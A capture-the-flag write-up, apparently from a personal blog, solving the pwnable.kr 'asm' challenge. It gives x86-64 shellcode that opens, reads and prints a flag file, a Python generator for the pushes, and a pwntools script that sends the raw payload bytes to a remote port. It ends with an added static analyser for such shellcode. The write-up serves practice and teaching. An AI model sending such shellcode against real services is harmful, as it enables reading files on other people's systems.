
pwnable.kr asm

by morae23 2019. 2. 1.

[Toddler's Bottle] asm


Connecting over ssh shows the following files.




The screenshot below shows part of the source code.




The task is to supply shellcode that reads the flag file using open(), read() and write().


section .text
global _start

_start:
    push 0x0                        ; NUL terminator of the file name
    mov rax, 0x676e6f306f306f       ; "o0o0ong" (last 7 bytes, pushed first)
    push rax
    mov rax, 0x306f306f306f306f     ; "o0o0o0o0"
    push rax
    mov rax, 0x3030303030303030     ; "00000000"
    push rax
    mov rax, 0x303030306f6f6f6f     ; "oooo0000"
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f     ; "oooooooo"
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f3030303030     ; "00000ooo"
    push rax
    mov rax, 0x3030303030303030     ; "00000000"
    push rax
    mov rax, 0x3030303030303030
    push rax
    mov rax, 0x303030306f6f6f6f     ; "oooo0000"
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f     ; "oooooooo" x 9
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6f6f6f6f6f6f6f6f
    push rax
    mov rax, 0x6c5f797265765f73     ; "s_very_l"
    push rax
    mov rax, 0x695f656d616e5f65     ; "e_name_i"
    push rax
    mov rax, 0x6c69665f6568745f     ; "_the_fil"
    push rax
    mov rax, 0x7972726f732e656c     ; "le.sorry"
    push rax
    mov rax, 0x69665f736968745f     ; "_this_fi"
    push rax
    mov rax, 0x646165725f657361     ; "ase_read"
    push rax
    mov rax, 0x656c705f656c6966     ; "file_ple"
    push rax
    mov rax, 0x5f67616c665f726b     ; "kr_flag_"
    push rax
    mov rax, 0x2e656c62616e7770     ; "pwnable."
    push rax
    mov rax, 0x5f73695f73696874     ; "this_is_"
    push rax                        ; push filepath

    mov rdi, rsp                    ; rdi = pointer to the file name on the stack
    xor rax, rax
    xor rsi, rsi                    ; flags = O_RDONLY (0)
    xor rdx, rdx                    ; mode = 0
    mov rax, 0x2                    ; open()
    syscall

    mov rdi, rax                    ; fd returned by open()
    mov rsi, rsp                    ; buffer on the stack
    mov rdx, 0x100
    mov rax, 0x0                    ; read()
    syscall

    mov rdi, 0x1                    ; stdout
    mov rsi, rsp
    mov rdx, 0x100
    mov rax, 0x1                    ; write()
    syscall

    xor rdi, rdi
    mov rax, 0x3c                   ; exit()
    syscall



Looking at the shellcode, it calls open(), read(), write() and exit() in turn.

Since the binary is 64-bit, the system call number is placed in rax according to the system call table.

The arguments were placed in rdi, rsi, rdx and rcx in order.

The buffer, the second argument of read() and write(), was set to rsp.

For the file name, it was pushed onto the stack and then rsp was passed as the pointer.

Because the file name is long, Python was used to generate the pushes.


#!/usr/bin/env python
# Emit "mov rax, imm64 / push rax" pairs that push the file name onto the
# stack from its end backwards, little-endian within each 8-byte chunk.

l = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"

# The last 7 characters ("o0o0ong") are pushed first, with a NUL in the top byte.
p = ['push 0x676e6f306f306f']
i = -8

while True:
    tmp = ""
    for j in range(8):
        # highest address first, so the hex literal is little-endian in memory
        tmp += hex(ord(l[i-j]))[2:]
    p.append('mov rax, 0x' + tmp + '\npush rax')
    i -= 8
    if i-8 < -232:
        break

for i in p:
    print(i)

Now assemble the shellcode with the following commands.

# 64-bit object: the source uses rax/rsp, so an elf32 target would not assemble it
nasm -f elf64 shell.s
ld -o shell shell.o

The exploit code is as follows.

#!/usr/bin/env python2
# Python 2: the payload below is a str of the raw assembled shellcode bytes.

from pwn import *

p = remote("0.0.0.0", 9026)   # host left as in the original; port 9026
print p.read()                # challenge banner

p.send("\x6a\x00\x48\xb8\x6f\x30\x6f\x30\x6f\x6e\x67\x00\x50\x48\xb8\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x73\x5f\x76\x65\x72\x79\x5f\x6c\x50\x48\xb8\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x50\x48\xb8\x5f\x74\x68\x65\x5f\x66\x69\x6c\x50\x48\xb8\x6c\x65\x2e\x73\x6f\x72\x72\x79\x50\x48\xb8\x5f\x74\x68\x69\x73\x5f\x66\x69\x50\x48\xb8\x61\x73\x65\x5f\x72\x65\x61\x64\x50\x48\xb8\x66\x69\x6c\x65\x5f\x70\x6c\x65\x50\x48\xb8\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x50\x48\xb8\x70\x77\x6e\x61\x62\x6c\x65\x2e\x50\x48\xb8\x74\x68\x69\x73\x5f\x69\x73\x5f\x50\x48\x89\xe7\x48\x31\xc0\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\xba\x00\x01\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\x48\x89\xe6\xba\x00\x01\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05")

p.interactive()


Running it yields the flag as shown below.
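A payload like the one sent above can be checked statically before it is ever run. The Python 3 script below is an added example, not part of the original write-up: it recognises only the few encodings this shellcode uses (push imm8, mov rax imm64 followed by push rax, mov eax imm32, syscall), rebuilds the string the pushes leave on the stack and lists the syscalls by number. SAMPLE is a constructed fixture that pushes a hypothetical /tmp/flag the same way; passing the real payload bytes to analyze() instead recovers the full file name and the open/read/write/exit sequence.

```python
#!/usr/bin/env python3
"""Static check of a push-string / syscall shellcode (added example).

Recognises only the encodings the write-up's shellcode uses:
  6a xx          push imm8          48 b8 <8 bytes> 50   mov rax, imm64 ; push rax
  b8 <4 bytes>   mov eax, imm32     0f 05                syscall
Other bytes are skipped one at a time, so this is not a general disassembler.
"""
import struct

SYSCALL_NAMES = {0: "read", 1: "write", 2: "open", 60: "exit"}  # x86-64 numbers


def analyze(code):
    """Return (string left on the stack, list of syscall names) for `code`."""
    chunks = []     # 8-byte stack slots in push order
    eax = None      # last immediate loaded into eax/rax before a syscall
    calls = []
    i = 0
    while i < len(code):
        if code[i] == 0x6A and i + 1 < len(code):                 # push imm8
            chunks.append(struct.pack("<q", struct.unpack("<b", code[i+1:i+2])[0]))
            i += 2
        elif code[i:i+2] == b"\x48\xb8" and code[i+10:i+11] == b"\x50":
            chunks.append(code[i+2:i+10])                         # mov rax, imm64 ; push rax
            i += 11
        elif code[i] == 0xB8 and i + 5 <= len(code):              # mov eax, imm32
            eax = struct.unpack("<I", code[i+1:i+5])[0]
            i += 5
        elif code[i:i+2] == b"\x0f\x05":                          # syscall
            calls.append(SYSCALL_NAMES.get(eax, "sys_%s" % eax))
            i += 2
        else:
            i += 1
    # The last push sits at the lowest address, so memory reads in reverse push order.
    memory = b"".join(reversed(chunks))
    text = memory.split(b"\x00", 1)[0].decode("ascii", "replace")
    return text, calls


# Constructed fixture (not from the write-up): pushes "/tmp/flag" the same way,
# then open() and exit(). Real analysis would pass the payload bytes instead.
SAMPLE = (b"\x6a\x00"                                    # push 0 (NUL terminator)
          + b"\x48\xb8" + b"g\x00\x00\x00\x00\x00\x00\x00" + b"\x50"
          + b"\x48\xb8" + b"/tmp/fla" + b"\x50"
          + b"\x48\x89\xe7" + b"\x48\x31\xf6\x48\x31\xd2"  # mov rdi, rsp ; xor rsi ; xor rdx
          + b"\xb8\x02\x00\x00\x00\x0f\x05"              # mov eax, 2 ; syscall -> open
          + b"\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05")  # xor rdi, rdi ; exit

if __name__ == "__main__":
    path, calls = analyze(SAMPLE)
    print("path: %r\nsyscalls: %s" % (path, " -> ".join(calls)))
```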



